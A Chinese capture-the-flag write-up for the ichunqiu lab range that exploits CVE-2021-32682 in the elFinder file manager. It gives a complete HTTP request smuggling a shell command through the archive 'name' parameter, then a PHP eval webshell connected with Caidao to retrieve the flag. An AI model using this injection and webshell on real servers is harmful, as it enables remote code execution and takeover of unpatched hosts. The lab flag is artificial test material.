春秋云镜 CVE-2021-32682 elFinder RCE
靶标介绍
elFinder是一套基于Drupal平台的、开源的AJAX文件管理器。该产品提供多文件上传、图像缩放等功能;elFinder 存在安全漏洞,攻击者可利用该漏洞在托管elFinder PHP连接器的服务器上执行任意代码和命令。
启动场景
漏洞利用
进入elfinder.html,创建一个普通的文本文件1.txt
右键这个文件,对其进行打包,打包后的文件命名为2.zip
POC
GET /php/connector.minimal.php?cmd=archive&name=-TvTT=id>shell.php%20%23%20a.zip&target=l1_Lw&targets%5B1%5D=l1_Mi56aXA&targets%5B0%5D=l1_MS50eHQ&type=application%2Fzip HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://localhost.lan:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
burp更改请求包,返回错误信息,
访问http://eci-2ze0uip18b0489vskvta.cloudeci1.ichunqiu.com/files/shell.php
id
命令已执行
对木马进行url编码后上传,
echo '<?php @eval($_POST['cmd']);?>'
菜刀连接webshell http://eci-2ze0uip18b0489vskvta.cloudeci1.ichunqiu.com/files/shell.php
得到flag
flag{9449eed4-90d8-44f4-a99a-2dfdd1d7f6e9}